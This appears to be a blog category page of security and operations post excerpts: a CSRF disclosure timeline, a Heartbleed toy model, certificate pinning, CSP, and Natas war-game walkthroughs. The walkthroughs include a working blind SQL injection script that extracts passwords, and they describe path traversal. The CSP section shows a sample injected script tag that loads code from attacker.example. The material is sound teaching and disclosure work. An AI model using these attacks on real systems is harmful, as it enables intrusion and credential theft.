News for the ‘System engineering’ Category

Book review: Site Reliability Engineering

Google has been working for about 2 years on a book about Site Reliability Engineering, the discipline and organization that keeps Google's large-scale systems running smoothly. "Site Reliability Engineering" was finally published last week. It spans some 500 pages, and offers a rare inside glimpse into how Google actually works. The authors are remarkably open, naming technologies and projects, and explaining how systems work. There may not be source code, but there's lots here that can be implemented outside Google. That makes it a great read for startups expecting to scale and small-to-medium tech companies that want to up their reliability game.


Diagnosing performance degradation under adverse circumstances

[This post is a few years old and was never published. Recently, I was reminded about memcached slab imbalance, which in turn reminded me of this post.]

At work, we encountered a sudden and precipitous performance regression on one particular page of a legacy application. It's a Perl web application, running under mod_perl, using ModPerl::RegistryLoader to compile scripts at server startup, and Apache::DBI to provide persistent database connections.
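Apache::DBI keeps database handles open between requests inside each Apache child process. By default, a later `connect` with the same arguments returns the cached handle after pinging it, and only reconnects if the ping fails. Here is a rough Python analogue of that per-process cache. It uses SQLite so it runs anywhere. The function name `cached_connect` is hypothetical, and this is not Apache::DBI's code.

```python
import sqlite3
from typing import Dict

# One cache per process, as with Apache::DBI under mod_perl: each Apache
# child keeps its own handles, so N children may hold N open connections.
_handles: Dict[str, sqlite3.Connection] = {}

def cached_connect(dsn: str) -> sqlite3.Connection:
    """Return a cached connection for `dsn`, reconnecting if the old one is dead."""
    conn = _handles.get(dsn)
    if conn is not None:
        try:
            conn.execute("SELECT 1")  # cheap "ping" before handing the handle out
            return conn
        except sqlite3.ProgrammingError:  # raised for a closed connection
            pass
    conn = sqlite3.connect(dsn)
    _handles[dsn] = conn
    return conn
```

The upside is that each request skips the connection setup cost. The downside is that state left on a long-lived handle (open transactions, session settings) survives into later requests served by the same process.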

Our users suddenly began complaining about one particular page being "three times slower than normal." Later examination of the Apache logs showed a 20x(!!) slowdown.
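A slowdown factor like this usually comes from comparing response times for the same URL before and after the regression. Below is a minimal sketch that assumes the Apache `LogFormat` ends with `%D` (time taken to serve the request, in microseconds) and includes the quoted request line. The log layout and the page path you pass in are assumptions, not details from the original investigation.

```python
import statistics

def response_times_ms(lines, path):
    """Response times in milliseconds for requests whose URL path equals `path`.

    Assumes each log line contains the quoted request line, e.g.
    "GET /page.pl?id=1 HTTP/1.1", and ends with Apache's %D field.
    """
    times = []
    for line in lines:
        try:
            _method, url, _protocol = line.split('"')[1].split()
            micros = int(line.rsplit(None, 1)[1])
        except (IndexError, ValueError):
            continue  # skip lines that don't match the assumed format
        if url.split("?", 1)[0] == path:
            times.append(micros / 1000)
    return times

def slowdown(before_ms, after_ms):
    """Ratio of median response times; the median is robust to a few outliers."""
    return statistics.median(after_ms) / statistics.median(before_ms)
```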

Investigating this performance problem was interesting because we didn't have good access to the data we needed, and our technology choices slowed us down or completely prevented us from collecting it. Although we solved the mystery, the experience taught us several important lessons.

CSRF vulnerability at CloudAtCost

CloudAtCost provides low-cost virtual machines hosted in Canada. Its web-based management interface is where customers install OS images, access a console, and so on.

[Image: A system security breach indicator light. Photo by Jeff Keyzer (CC-BY-SA)]

A cross-site request forgery vulnerability was discovered in this web application. If a customer could be tricked into visiting a crafted URL while logged in, an attacker could change the victim's password, gaining access to the management interface.

In turn, this grants root access on all the victim's VMs, the ability to wipe or reinstall VMs, and potentially allows the attacker to spend the victim's money on CloudAtCost products and services.

Changing the password does not end the session or email the user, so the victim will not immediately notice anything is wrong. Exploitation of CSRF is difficult to detect on the server, so CloudAtCost is unlikely to notice anything is wrong either.

There is no evidence the vulnerability is being exploited, but exploitation is trivial and its impact is severe. The attacker only has to build a URL of the following form:

$uri_encoded_password

Any method that gets the victim to load the crafted URL in their browser while logged in will change their password, and the attacker can then simply log in. Phishing emails are a common exploitation vector. A watering hole attack would also work: create a website that CloudAtCost users would visit, or use one that already exists, and embed the crafted URL in it, for example as an img resource. Other exploitation methods are certainly available and practicable.
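The standard defense against this class of bug is a synchronizer token. The server stores a random value in the user's session, embeds it in the change-password form, and rejects any state-changing request that doesn't send it back. An attacker's page can make the victim's browser send a request, but it can't read the token. This is a generic Python sketch, not CloudAtCost's actual fix. The `session` and `form` dictionaries and the `set_password` callback are hypothetical stand-ins for a web framework's objects.

```python
import hmac
import secrets

def issue_csrf_token(session: dict) -> str:
    """Create a per-session token; the form embeds it as a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def change_password(session: dict, form: dict, set_password) -> bool:
    """Apply the change only if the request carries the session's token."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    # Compare as bytes in constant time; a forged cross-site request can't know the token.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    set_password(form["new_password"])
    return True
```

Accepting the change only via POST and asking for the current password would raise the bar further, and emailing the user after a password change would make a successful attack noticeable.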


  • September 25, 2014: vulnerability discovered, and disclosed to CloudAtCost through a customer support ticket. Feedback is passed along, and the customer support ticket is closed.
  • September 25: vulnerability report is escalated via email. No reply.
  • October 2: vulnerability report is escalated via email, and a single point of contact at CloudAtCost is provided. Details are provided to that contact directly. No reply.
  • October 9: Direct contact is made with CloudAtCost and the Canadian Cyber Incident Response Centre (CCIRC), and full details are repeated. Follow-up is promised, but doesn't happen.
  • October 14: CCIRC reports that the vulnerability has been fixed. Testing shows that this is not the case. Clarification is requested from CloudAtCost. Deployment of the patch is scheduled for November 1.
  • November 3: The self-imposed date for deploying the patch (November 1) passes, and the application is still vulnerable. Clarification is requested from CloudAtCost. None is provided.
  • November 7: Information on the progress of deploying the patched application is requested. None is provided.
  • November 14: I speak with a CloudAtCost representative on the phone, who says their team is having trouble getting a release out and needs more time.
  • November 26: Information on the progress of deploying a fixed version of the web application is requested. No reply.
  • December 10: A hard deadline for public disclosure is set and sent to CloudAtCost. It turns out a fixed version of the web application had been deployed within the previous 3-4 days.
  • December 11: This disclosure is published.

Recovering from Heartbleed

Heartbleed is a critical vulnerability in OpenSSL revealed yesterday. I'm not sure it could be more serious: it allows an attacker to connect to your server and use the TLS heartbeat extension to obtain 64k of server memory (and do it again to get another 64k, and again, and...) -- while leaving no traces in logs. That server memory might include primary key material (private keys), secondary key material (usernames and passwords), and collateral (memory addresses, canaries used to detect overflow, etc.).
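To make the mechanism concrete, here is a toy Python model of the missing bounds check. It is not OpenSSL's code. A heartbeat request declares its own payload length in a 16-bit field (hence the roughly 64k ceiling), and the vulnerable handler echoes that many bytes without checking the length against the record it actually received. The memory layout, the sample secret, and the function name `handle_heartbeat` are hypothetical.

```python
import struct

# Toy model of the Heartbleed bug (CVE-2014-0160), NOT OpenSSL's code.
# Heartbeat message: type (1 byte) | payload_length (2 bytes, big-endian)
#                    | payload | padding (at least 16 bytes, per RFC 6520)
HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16

def handle_heartbeat(memory: bytes, record_len: int, check_bounds: bool) -> bytes:
    """Answer a heartbeat request that starts at memory[0] and is record_len bytes long."""
    if memory[0] != HEARTBEAT_REQUEST:
        return b""
    (claimed_len,) = struct.unpack(">H", memory[1:3])  # 16 bits: at most 65535
    if check_bounds and 1 + 2 + claimed_len + MIN_PADDING > record_len:
        return b""  # patched behavior: silently discard the malformed request
    # Vulnerable behavior: trust claimed_len and copy that many bytes, running
    # past the end of the record into whatever happens to sit next to it.
    echoed = memory[3:3 + claimed_len]
    return bytes([HEARTBEAT_RESPONSE]) + struct.pack(">H", claimed_len) + echoed

# A request that claims a 64-byte payload but carries only 2 bytes ("hi").
request = bytes([HEARTBEAT_REQUEST]) + struct.pack(">H", 64) + b"hi" + bytes(MIN_PADDING)
# Pretend a secret happens to live right after the request buffer in memory.
memory = request + b"user=alice&password=hunter2"

leaked = handle_heartbeat(memory, len(request), check_bounds=False)
patched = handle_heartbeat(memory, len(request), check_bounds=True)
print(b"hunter2" in leaked)  # True: the response includes neighboring memory
print(patched)               # b'': the request is dropped
```

The check mirrors the idea of the real fix: a request whose declared payload plus header and minimum padding doesn't fit in the received record is discarded rather than answered.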

Validating SSL certificates for IRC bouncers

IRC bouncers are sort of like a proxy. Your bouncer stays online, connected to IRC, all the time, and then you connect to the bouncer using a normal IRC client. I connect to my bouncer with an SSL-encrypted connection, but I hadn't been validating the certificate until now. Validating the SSL certificate is critical for thwarting man-in-the-middle (MITM) attacks.

In a MITM attack, the victim connects to the attacker, thinking it is the service they want to talk to (the IRC bouncer in this case). The attacker then forwards the connection to the service. Both connections might use SSL, but in the middle, the attacker can see the plaintext. They can simply eavesdrop, or modify the data flowing in both directions. SSL is supposed to prevent that, but if you don't validate the certificate, then you don't know who you're talking to. I want to know I'm really talking to my IRC bouncer, so let's figure out how to validate that certificate.
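How you validate depends on your IRC client. As a client-agnostic sketch, here is Python's standard `ssl` module pinning the bouncer's certificate by its SHA-256 fingerprint, which suits the self-signed certificates bouncers often use. The function names are hypothetical, and pinning is one option among several; trusting the bouncer's certificate as a custom CA is another.

```python
import hashlib
import hmac
import socket
import ssl

def sha256_fingerprint(der_cert: bytes) -> str:
    """Colon-separated uppercase hex, the style `openssl x509 -noout -fingerprint -sha256` prints."""
    digest = hashlib.sha256(der_cert).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

def connect_pinned(host: str, port: int, expected_fp: str) -> ssl.SSLSocket:
    """Open a TLS connection and refuse it unless the certificate matches the pin."""
    ctx = ssl.create_default_context()
    # A self-signed bouncer certificate won't chain to a public CA, so CA and
    # hostname checks are replaced by the exact-fingerprint check below.
    ctx.check_hostname = False  # must be disabled before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    sock = ctx.wrap_socket(socket.create_connection((host, port)), server_hostname=host)
    actual = sha256_fingerprint(sock.getpeercert(binary_form=True)).replace(":", "")
    wanted = expected_fp.replace(":", "").upper()
    if not hmac.compare_digest(actual.encode(), wanted.encode()):
        sock.close()
        raise ssl.SSLError(f"certificate fingerprint mismatch for {host}:{port}; possible MITM")
    return sock
```

Get the expected fingerprint once, over a channel you trust (for example by running the `openssl x509` command above on the bouncer host itself). Then do the check before sending anything, including your bouncer password.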

Presenting my Natas solutions at NSLUG

Last Monday, I presented my solutions to the Natas server-side security war games at my local Linux users' group.

I recorded my talk, but it didn't turn out well. I was using Google Hangouts for the first time, and I forgot that it only records the windows you tell it to. In the video, embedded below the fold, there's a lot of talking about windows that were being projected, but which didn't get recorded. Still, the audio counts for something, and you can see what I'm talking about much of the time.

SSL configuration on nginx

This SSL configuration for nginx achieves an A on the Qualys SSL Labs server test. It's what this server currently uses.

Server-side security war games: Part 15

We're nearly at the end! This is the second-to-last level.

We know there is a users table, with columns "username" and "password". This time, the code just checks that the username exists. There's no way to print out the data we want. Instead, we'll have to do something cleverer.
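One cleverer approach is boolean-based blind SQL injection. The page only tells us whether the user exists, so we treat that yes/no answer as an oracle and ask it about the password one character at a time. The sketch below is hypothetical end to end. An in-memory SQLite table stands in for the level's database (hence single quotes and `substr`), and in the real level `user_exists` would be an HTTP request to the form.

```python
import sqlite3
import string

# Toy stand-in for the level's back end (NOT the real Natas code).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 'S3cret')")

def user_exists(username: str) -> bool:
    """Vulnerable oracle: the query is built by string concatenation,
    and the only thing it reveals is whether any row matched."""
    query = "SELECT * FROM users WHERE username = '" + username + "'"
    return db.execute(query).fetchone() is not None

def extract_password(user: str, alphabet: str = string.ascii_letters + string.digits) -> str:
    known = ""
    while True:
        for ch in alphabet:
            # Inject a condition on the next character; "user exists" means we guessed right.
            probe = f"{user}' AND substr(password, {len(known) + 1}, 1) = '{ch}"
            if user_exists(probe):
                known += ch
                break
        else:
            return known  # nothing matched: we've read past the last character

print(extract_password("alice"))  # S3cret
```

Each character costs at most one request per alphabet symbol. Comparing with `<` and bisecting would need far fewer requests, at the cost of a slightly more complex loop.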

Server-side security war games: Part 7

Level 7 is a simple webpage that doesn't seem to offer us any clues about a vulnerability. Let's click around those links a bit to see more.

Well, each of these links passes the name of the page to a PHP script, which seems to just stuff the contents of the file into the webpage. So, we should be able to change that URL parameter to whatever we want, in order to get the contents of the file containing the next password.
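Here is the flaw in miniature, plus the usual fix, as a Python sketch rather than the level's PHP. Joining an unchecked parameter onto a directory path lets `../` sequences or an absolute path reach any file the web server can read. The function names and the directory layout are hypothetical.

```python
from pathlib import Path

def vulnerable_include(base: Path, page: str) -> Path:
    """The flaw: the page parameter is joined onto the directory unchecked.
    An absolute path replaces `base` entirely, and "../" climbs out of it."""
    return base / page

def safe_include(base: Path, page: str) -> Path:
    """Resolve the path first, then refuse anything outside the pages directory."""
    root = base.resolve()
    target = (root / page).resolve()
    if root not in target.parents:
        raise PermissionError(f"{page!r} escapes {root}")
    return target
```

An allowlist of known page names is stricter still, and it is often simpler when the set of pages is small.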

Server-side security war games: Part 6

On level 6, there is a curious "Input secret" form. I wonder what it does? Well, there is also a "View sourcecode" link, which will presumably show us the source code for that form. Then we can try to analyze whether it has any weaknesses we can take advantage of.

Server-side security war games: Part 3

There is still nothing on this page, and if we look at the source now, they've removed that image. Instead, there's a taunt that not even Google will find it this time.

Well, Google is a good little robot puppy who always obeys his master, but we are evil attackers. What rules do robots have to follow that we don't? The ones in robots.txt. Let's look at what they don't want Google to see. robots.txt always lives at the root of the domain, so open /robots.txt on this level's site.

They've hidden /s3cr3t/ from crawlers, but we don't have to abide by that. Let's take a look. It's another directory listing, with a file containing our password.
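Python's standard `urllib.robotparser` shows how advisory robots.txt is. A polite crawler asks `can_fetch` and stays out, but nothing stops anyone from reading the file and requesting the disallowed paths directly. The robots.txt contents here are a hypothetical reconstruction containing only the /s3cr3t/ entry, and `disallowed_paths` is an illustrative helper.

```python
from urllib.robotparser import RobotFileParser

ROBOTS_TXT = """\
User-agent: *
Disallow: /s3cr3t/
"""

def disallowed_paths(robots_txt: str) -> list:
    """Every Disallow path: a polite crawler skips these, an attacker reads them as a to-do list."""
    paths = []
    for line in robots_txt.splitlines():
        field, _, value = line.partition(":")
        if field.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths

parser = RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())
print(parser.can_fetch("Googlebot", "/s3cr3t/"))  # False: a well-behaved bot stays out
print(disallowed_paths(ROBOTS_TXT))               # ['/s3cr3t/']
```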

Lessons learned

Remember that hiding things from search engines is very different from making them inaccessible. Even some web crawlers won't respect your robots.txt file, and attackers certainly won't. If you need to make something inaccessible, configure that in your webserver, not in robots.txt.

See you soon for level 4!

Server-side security war games: Part 0

There is a series of "war games" -- challenges that help you learn by doing. Natas is the webserver security series. Although walkthroughs are already available, I am going to write my own series of posts: some of the existing walkthroughs are overly complex, and none actually finishes all the levels. The war games unfortunately don't explain why the example vulnerabilities can matter in real-world scenarios, so I'll try to fill that void.

I'm going to post one every few days, beginning with levels zero and one today.

Planning a Content-Security-Policy with Dancer

The same-origin policy is a fundamental part of the security infrastructure of the web. It prevents scripts running on one site from reading data that belongs to other sites. This helps keep your data safe: if your bank's website gives you some data, only your bank's website can access it, not scripts from other websites.

That's a nice theory. It'd be a shame if some evidence happened to it.

In the real world, attackers have found ways to get around the same-origin policy to gain access to data they're not supposed to be able to access. For example, a web programmer might mistakenly include some user-provided input verbatim in the HTML of a webpage -- perhaps a username. Well, if your username is <script type="text/javascript" src=""></script>, then how is the web browser supposed to know if that was intentionally put in the HTML of the page? Same-origin policies are insufficient in the face of programmer error. Enter Content Security Policy.
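Here are the two layers side by side, sketched in Python rather than Dancer. The first escapes user input so the username renders as text. The second is a Content-Security-Policy header value that would stop the browser from running an injected script even if the escaping were forgotten. The helper name `build_csp`, the directive choices, and the attacker URL are assumptions for illustration.

```python
import html
from typing import Dict, List

def build_csp(directives: Dict[str, List[str]]) -> str:
    """Serialize directives into a Content-Security-Policy header value."""
    return "; ".join(" ".join([name, *sources]) for name, sources in directives.items())

policy = build_csp({
    "default-src": ["'self'"],
    # Only scripts from our own origin; without 'unsafe-inline', inline <script>
    # blocks are refused too, so an injected tag runs neither inline nor remote code.
    "script-src": ["'self'"],
    "object-src": ["'none'"],
})
print(policy)  # default-src 'self'; script-src 'self'; object-src 'none'

# Hypothetical malicious username pointing at an attacker-controlled script.
evil_username = '<script type="text/javascript" src="https://attacker.example/x.js"></script>'
print(html.escape(evil_username))  # rendered as inert text, not as a tag
```

Escaping remains the primary defense. The policy is the safety net that turns a programmer's mistake into a blocked request rather than running attacker code.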

Wherein I realize the bliss of writing init scripts with Daemon::Control

Init scripts are annoying little things - almost entirely boilerplate. Here's how I learned to stop struggling and love Daemon::Control for controlling my daemons.

The module really is as simple as the synopsis: you describe the daemon, have it write an init script for you (which actually just runs your Daemon::Control script), then run update-rc.d and you're golden.
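Under the hood, an init script is mostly a dispatcher. It maps `start`, `stop`, and `status` onto launching a program, recording its PID in a pidfile, and signalling that PID later. This is the boilerplate a generated script spares you. The Python class below is a simplified, hypothetical analogue for illustration, not Daemon::Control's API. It skips things a real daemon launcher handles, such as double-forking, dropping privileges, and redirecting output.

```python
import os
import signal
import subprocess
from pathlib import Path
from typing import List, Optional

class InitScript:
    """Hypothetical, simplified analogue of an init script (not Daemon::Control's API)."""

    def __init__(self, name: str, program: List[str], pid_file: Path):
        self.name = name
        self.program = program
        self.pid_file = pid_file

    def _running_pid(self) -> Optional[int]:
        """PID from the pidfile, if that process still exists."""
        try:
            pid = int(self.pid_file.read_text())
            os.kill(pid, 0)  # signal 0 sends nothing; it only checks the PID exists
        except (FileNotFoundError, ValueError, ProcessLookupError):
            return None
        return pid

    def start(self) -> int:
        pid = self._running_pid()
        if pid is None:
            # start_new_session detaches the child from our terminal's session.
            pid = subprocess.Popen(self.program, start_new_session=True).pid
            self.pid_file.write_text(str(pid))
        return pid

    def stop(self) -> None:
        pid = self._running_pid()
        if pid is not None:
            os.kill(pid, signal.SIGTERM)
        self.pid_file.unlink(missing_ok=True)

    def status(self) -> str:
        pid = self._running_pid()
        return f"{self.name} running (pid {pid})" if pid else f"{self.name} not running"

    def run(self, action: str):
        """Dispatch the way `/etc/init.d/<name> start|stop|status` does."""
        actions = {"start": self.start, "stop": self.stop, "status": self.status}
        return actions[action]()
```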